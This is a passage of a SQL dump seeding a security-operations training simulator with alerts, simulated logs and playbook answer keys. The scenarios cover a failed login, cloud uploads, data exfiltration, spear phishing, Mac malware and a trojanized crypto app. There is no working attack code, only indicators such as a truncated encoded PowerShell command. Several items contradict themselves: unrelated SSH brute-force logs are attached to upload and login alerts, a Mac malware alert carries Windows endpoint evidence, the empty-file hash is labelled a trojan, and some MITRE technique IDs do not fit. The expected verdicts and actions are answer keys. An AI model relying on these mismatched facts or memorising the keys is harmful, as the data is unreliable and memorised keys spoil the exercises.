4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T16:00:00Z\\\",\\\"event_type\\\":\\\"email_sent\\\",\\\"src_ip\\\":\\\"192.168.1.55\\\",\\\"dst_ip\\\":\\\"10.0.0.10\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"CORP-LAP-606\\\",\\\"email_sender\\\":\\\"jdoe@corporate.com\\\",\\\"email_receiver\\\":\\\"personalemail@example.com\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1440, 'Failed Brute Force Login Attempt', 'low', 'Forcepoint', 'A login attempt failed due to incorrect credentials from an external IP, no further attempts were noted.', 'Credential Attack', 'T1078', 0, 'investigating', NULL, '{\"timestamp\":\"2026-03-02T17:00:00Z\",\"event_type\":\"login_failure\",\"src_ip\":\"203.0.113.80\",\"dst_ip\":\"192.168.1.60\",\"username\":\"jdoe\",\"hostname\":\"CORP-SVR-707\",\"failed_attempts\":1}', '2026-03-02 03:22:47', '2026-03-07 05:19:00', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.80\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"clean\",\"details\":\"No malicious activity reported for this IP\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.60\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Monitoring\",\"verdict\":\"internal\",\"details\":\"Internal IP of the server\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The failed login attempt was a one-off incident and does not indicate a brute force attack.\"}', 'Beginner', 'DLP', 3, 1, 'TECH', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-02T13:55:06.999Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T17:00:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.80\\\",\\\"dst_ip\\\":\\\"192.168.1.60\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"CORP-SVR-707\\\",\\\"failed_attempts\\\":1}\"},{\"timestamp\":\"2026-03-02T13:54:06.999Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T17:00:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.80\\\",\\\"dst_ip\\\":\\\"192.168.1.60\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"CORP-SVR-707\\\",\\\"failed_attempts\\\":1}\"},{\"timestamp\":\"2026-03-02T13:53:06.999Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T17:00:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.80\\\",\\\"dst_ip\\\":\\\"192.168.1.60\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"CORP-SVR-707\\\",\\\"failed_attempts\\\":1}\"},{\"timestamp\":\"2026-03-02T13:52:06.999Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T17:00:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.80\\\",\\\"dst_ip\\\":\\\"192.168.1.60\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"CORP-SVR-707\\\",\\\"failed_attempts\\\":1}\"},{\"timestamp\":\"2026-03-02T13:51:06.999Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T17:00:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.80\\\",\\\"dst_ip\\\":\\\"192.168.1.60\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"CORP-SVR-707\\\",\\\"failed_attempts\\\":1}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(1441, 'Potential Unauthorized Data Transfer to Cloud Storage', 'medium', 'Netskope', 'Detected potential unauthorized upload of files to personal cloud storage service from an employee\'s machine.', 'Data Exfil', 'T1059', 0, 'investigating', NULL, '{\"timestamp\":\"2026-03-02T18:00:00Z\",\"event_type\":\"web_request\",\"src_ip\":\"192.168.1.65\",\"dst_ip\":\"203.0.113.90\",\"username\":\"jdoe\",\"hostname\":\"CORP-DESK-808\",\"url\":\"http://personalcloud.example.com/upload\"}', '2026-03-02 03:22:47', '2026-03-03 12:15:59', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"url\",\"value\":\"http://personalcloud.example.com/upload\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"clean\",\"details\":\"Personal cloud storage, no malicious activity\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.65\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Monitoring\",\"verdict\":\"internal\",\"details\":\"Internal IP of the user\'s workstation\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"The upload was to a verified personal cloud account, flagged due to policy but not malicious.\"}', 'Beginner', 'DLP', 3, 1, 'TECH', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-02T13:55:07.000Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T18:00:00Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"192.168.1.65\\\",\\\"dst_ip\\\":\\\"203.0.113.90\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"CORP-DESK-808\\\",\\\"url\\\":\\\"http://personalcloud.example.com/upload\\\"}\"},{\"timestamp\":\"2026-03-02T13:54:07.000Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T18:00:00Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"192.168.1.65\\\",\\\"dst_ip\\\":\\\"203.0.113.90\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"CORP-DESK-808\\\",\\\"url\\\":\\\"http://personalcloud.example.com/upload\\\"}\"},{\"timestamp\":\"2026-03-02T13:53:07.000Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T18:00:00Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"192.168.1.65\\\",\\\"dst_ip\\\":\\\"203.0.113.90\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"CORP-DESK-808\\\",\\\"url\\\":\\\"http://personalcloud.example.com/upload\\\"}\"},{\"timestamp\":\"2026-03-02T13:52:07.000Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T18:00:00Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"192.168.1.65\\\",\\\"dst_ip\\\":\\\"203.0.113.90\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"CORP-DESK-808\\\",\\\"url\\\":\\\"http://personalcloud.example.com/upload\\\"}\"},{\"timestamp\":\"2026-03-02T13:51:07.000Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T18:00:00Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"192.168.1.65\\\",\\\"dst_ip\\\":\\\"203.0.113.90\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"CORP-DESK-808\\\",\\\"url\\\":\\\"http://personalcloud.example.com/upload\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(1442, 'Successful Data Exfiltration to External Server', 'critical', 'Forcepoint', 'Sensitive data was successfully transferred to a known external server without authorization.', 'Data Exfil', 'T1059', 1, 'Closed', 225, '{\"timestamp\":\"2026-03-02T19:00:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.1.70\",\"dst_ip\":\"203.0.113.100\",\"username\":\"jdoe\",\"hostname\":\"CORP-LAP-909\"}', '2026-03-02 03:22:47', '2026-03-06 10:00:02', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.70\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Monitoring\",\"verdict\":\"internal\",\"details\":\"Internal IP of the user\'s laptop\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.100\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP involved in data exfiltration incidents\"}}],\"expected_actions\":[\"block_ip\",\"collect_forensics\",\"isolate_host\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"The external server IP is linked to data exfiltration, confirming the breach.\"}', 'Beginner', 'DLP', 3, 1, 'TECH', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-02T13:55:07.006Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T19:00:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.70\\\",\\\"dst_ip\\\":\\\"203.0.113.100\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"CORP-LAP-909\\\"}\"},{\"timestamp\":\"2026-03-02T13:54:07.006Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T19:00:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.70\\\",\\\"dst_ip\\\":\\\"203.0.113.100\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"CORP-LAP-909\\\"}\"},{\"timestamp\":\"2026-03-02T13:53:07.006Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T19:00:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.70\\\",\\\"dst_ip\\\":\\\"203.0.113.100\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"CORP-LAP-909\\\"}\"},{\"timestamp\":\"2026-03-02T13:52:07.006Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T19:00:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.70\\\",\\\"dst_ip\\\":\\\"203.0.113.100\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"CORP-LAP-909\\\"}\"},{\"timestamp\":\"2026-03-02T13:51:07.006Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T19:00:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.70\\\",\\\"dst_ip\\\":\\\"203.0.113.100\\\",\\\"username\\\":\\\"jdoe\\\",\\\"hostname\\\":\\\"CORP-LAP-909\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(1443, 'Initial Access via Spear Phishing', 'medium', 'Employee Email', 'An email from a seemingly legitimate aerospace industry contact contains a malicious link leading to a compromised website, setting the stage for network infiltration.', 'Social Engineering', 'T1566.001 - Spear Phishing Link', 1, 'Closed', 232, '{\"timestamp\":\"2023-10-12T08:45:00Z\",\"source_ip\":\"172.217.18.110\",\"destination_ip\":\"10.0.0.15\",\"source_email\":\"j.smith@aerospace-experts.com\",\"destination_email\":\"t.miller@contractor-network.com\",\"subject\":\"Exciting Collaboration Opportunity\",\"malicious_link\":\"http://compromised-site.com/login\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\",\"email_id\":\"<a1b2c3d4e5f6@example.com>\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"filename\":\"Project_Plan.pdf\"}', '2026-03-03 22:01:10', '2026-03-13 16:22:18', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"172.217.18.110\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Database\",\"verdict\":\"malicious\",\"details\":\"Known IP associated with phishing campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"IP address belongs to the contractor\'s network.\"}},{\"id\":\"artifact_3\",\"type\":\"email\",\"value\":\"j.smith@aerospace-experts.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Email Reputation Service\",\"verdict\":\"suspicious\",\"details\":\"Email address used in similar phishing incidents.\"}},{\"id\":\"artifact_4\",\"type\":\"url\",\"value\":\"http://compromised-site.com/login\",\"is_critical\":true,\"osint_result\":{\"source\":\"URL Analysis Tool\",\"verdict\":\"malicious\",\"details\":\"URL hosts phishing landing page.\"}},{\"id\":\"artifact_5\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":false,\"osint_result\":{\"source\":\"File Hash Database\",\"verdict\":\"clean\",\"details\":\"Hash belongs to an empty file, potential decoy.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"collect_forensics\"]}', 'novice', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Initial Access via Spear Phishing\",\"date\":\"2026-03-03T22:56:57.368Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(1444, 'Execution of Custom Mac Malware', 'high', 'Endpoint Detection System', 'The attackers deployed custom Mac malware on a target system within the network. This malware is designed to evade detection and establish control over the system, allowing attackers to potentially pivot further into the network.', 'Malware Deployment', 'T1059.003 - Command and Scripting Interpreter: AppleScript', 1, 'Closed', 225, '{\"timestamp\":\"2023-10-12T14:23:32Z\",\"event_id\":\"mac_malware_exec_001\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.10\",\"username\":\"jdoe\",\"malware_filename\":\"launchProxy\",\"file_hash\":\"3fa8f88c9b1e237e9b6c8e1e4d9e2f7c\",\"action\":\"execution\",\"status\":\"blocked\",\"detection_method\":\"signature-based detection\",\"signature_name\":\"CustomMacMalware.v1\"}', '2026-03-03 22:01:10', '2026-03-09 03:22:28', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known command and control server associated with Lazarus Group.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal network IP address.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"launchProxy\",\"is_critical\":true,\"osint_result\":{\"source\":\"Endpoint Detection System\",\"verdict\":\"malicious\",\"details\":\"Malware designed to evade detection on MacOS systems.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"3fa8f88c9b1e237e9b6c8e1e4d9e2f7c\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known malicious Mac malware.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'novice', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(1445, 'Establishing Persistence and Lateral Movement', 'high', 'Network Traffic Analysis', 'The Lazarus Group has been detected using stolen credentials to move laterally within the network, targeting critical aerospace and military data. The threat actor is leveraging known TTPs to maintain access and seek sensitive information.', 'Lateral Movement', 'T1078: Valid Accounts', 1, 'Closed', 225, '{\"timestamp\":\"2023-10-12T14:23:45Z\",\"event_type\":\"authentication\",\"source_ip\":\"192.168.1.45\",\"destination_ip\":\"10.0.5.12\",\"user\":\"jdoe\",\"action\":\"login_success\",\"credentials\":{\"method\":\"password\",\"status\":\"compromised\"},\"malicious_file\":{\"filename\":\"persistent_agent.exe\",\"file_hash\":\"7e4d2b6e3f8c6b1b9a3c342f5d7a8a3b\"},\"attacker_ip\":\"203.0.113.5\"}', '2026-03-03 22:01:10', '2026-03-09 03:23:46', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of compromised host\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.5.12\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal_network\",\"verdict\":\"internal\",\"details\":\"Internal IP address of targeted system\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":true,\"osint_result\":{\"source\":\"user_directory\",\"verdict\":\"suspicious\",\"details\":\"User credentials used for lateral movement\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"7e4d2b6e3f8c6b1b9a3c342f5d7a8a3b\",\"is_critical\":true,\"osint_result\":{\"source\":\"malware_analysis\",\"verdict\":\"malicious\",\"details\":\"Hash associated with persistent malware used by Lazarus Group\"}},{\"id\":\"artifact_5\",\"type\":\"ip\",\"value\":\"203.0.113.5\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intelligence\",\"verdict\":\"malicious\",\"details\":\"Known IP address associated with Lazarus Group activities\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'novice', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(1446, 'Suspicious App Download Detected', 'medium', 'App Store logs', 'A suspicious cryptocurrency trading application potentially associated with the Lazarus Group was downloaded. The app is believed to be trojanized, aimed at infiltrating systems of cryptocurrency enthusiasts.', 'Initial Access', 'T1190: Exploit Public-Facing Application', 1, 'Closed', 225, '{\"timestamp\":\"2023-10-25T14:32:00Z\",\"event_id\":\"123456\",\"app_name\":\"CryptoTraderPro\",\"downloaded_by\":\"user@example.com\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.10\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"file_name\":\"CryptoTraderProSetup.exe\"}', '2026-03-03 22:03:46', '2026-03-05 05:21:53', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with Lazarus Group activity.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"suspicious\",\"details\":\"Hash associated with potentially trojanized applications.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"CryptoTraderProSetup.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Database\",\"verdict\":\"malicious\",\"details\":\"Trojanized application used to deliver malware.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'beginner', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-03T22:56:57.373Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-25T14:32:00Z\\\",\\\"event_id\\\":\\\"123456\\\",\\\"app_name\\\":\\\"CryptoTraderPro\\\",\\\"downloaded_by\\\":\\\"user@example.com\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.10\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"file_name\\\":\\\"CryptoTraderProSetup.exe\\\"}\"},{\"timestamp\":\"2026-03-03T22:55:57.373Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-25T14:32:00Z\\\",\\\"event_id\\\":\\\"123456\\\",\\\"app_name\\\":\\\"CryptoTraderPro\\\",\\\"downloaded_by\\\":\\\"user@example.com\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.10\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"file_name\\\":\\\"CryptoTraderProSetup.exe\\\"}\"},{\"timestamp\":\"2026-03-03T22:54:57.373Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-25T14:32:00Z\\\",\\\"event_id\\\":\\\"123456\\\",\\\"app_name\\\":\\\"CryptoTraderPro\\\",\\\"downloaded_by\\\":\\\"user@example.com\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.10\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"file_name\\\":\\\"CryptoTraderProSetup.exe\\\"}\"},{\"timestamp\":\"2026-03-03T22:53:57.373Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-25T14:32:00Z\\\",\\\"event_id\\\":\\\"123456\\\",\\\"app_name\\\":\\\"CryptoTraderPro\\\",\\\"downloaded_by\\\":\\\"user@example.com\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.10\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"file_name\\\":\\\"CryptoTraderProSetup.exe\\\"}\"},{\"timestamp\":\"2026-03-03T22:52:57.373Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-25T14:32:00Z\\\",\\\"event_id\\\":\\\"123456\\\",\\\"app_name\\\":\\\"CryptoTraderPro\\\",\\\"downloaded_by\\\":\\\"user@example.com\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"192.168.1.10\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"file_name\\\":\\\"CryptoTraderProSetup.exe\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
